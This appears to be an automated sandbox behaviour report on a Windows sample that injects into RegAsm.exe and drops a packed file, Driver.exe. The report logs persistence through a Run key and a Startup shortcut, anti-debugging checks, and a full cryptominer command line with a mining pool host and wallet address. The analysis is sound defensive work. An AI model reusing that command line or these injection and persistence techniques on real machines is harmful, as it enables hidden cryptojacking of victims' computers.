                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: kWYLtJ0Cn1.exeStatic file information: File size 4819968 > 1048576
                    Source: kWYLtJ0Cn1.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x3f9a00
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: kWYLtJ0Cn1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: kWYLtJ0Cn1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\9h4bqyhzw0\output.pdb source: kWYLtJ0Cn1.exe
                    Source: Binary string: C:\9h4bqyhzw0\output.pdb. source: kWYLtJ0Cn1.exe
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: kWYLtJ0Cn1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Unpacked PE file: 2.2.Driver.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Unpacked PE file: 20.2.Driver.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: Yara match; File source: 0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.kWYLtJ0Cn1.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: kWYLtJ0Cn1.exe PID: 7312, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 7368, type: MEMORYSTR
Source: initial sample; Static PE information: section where entry point is pointing to: .MPRESS2
Source: kWYLtJ0Cn1.exe; Static PE information: real checksum: 0x0 should be: 0x4a26f7
Source: Driver.exe.1.dr; Static PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
Source: Driver.exe.1.dr; Static PE information: section name: .MPRESS1
Source: Driver.exe.1.dr; Static PE information: section name: .MPRESS2
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Code function: 0_2_00F8E1C4 push ecx; ret 0_2_00F8E1D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Driver
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Driver
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 1210000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 2E80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: 2CC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Window / User API: threadDelayed 5197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456; Thread sleep count: 5197 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456; Thread sleep time: -5197000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456; Thread sleep count: 196 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7456; Thread sleep time: -196000s >= -30000s
Source: Driver.exe, 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW FO%SystemRoot%\system32\mswsock.dll
Source: Driver.exe, 00000002.00000002.1743254277.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000007.00000002.3093652919.0000000000431000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
Source: Driver.exe, 00000007.00000002.3093652919.0000000000431000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Driver.exe, 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWws\System32\en-US\wshqos.dll.mui
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe; Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 1_2_012132F0 LdrInitializeThunk, 1_2_012132F0
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Code function: 0_2_00FCC90D mov eax, dword ptr fs:[00000030h] 0_2_00FCC90D
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Code function: 0_2_00FC6108 mov ecx, dword ptr fs:[00000030h] 0_2_00FC6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Code function: 0_2_00F8E824 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 0_2_00F8E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Code function: 0_2_001E018D GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, CreateProcessA, CreateProcessA, VirtualAlloc, VirtualAlloc, GetThreadContext, Wow64GetThreadContext, ReadProcessMemory, ReadProcessMemory, VirtualAllocEx, VirtualAllocEx, GetProcAddress, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, SetThreadContext, Wow64SetThreadContext, ResumeThread, ResumeThread, 0_2_001E018D
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7FA000
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7FC000
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C4A008
Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
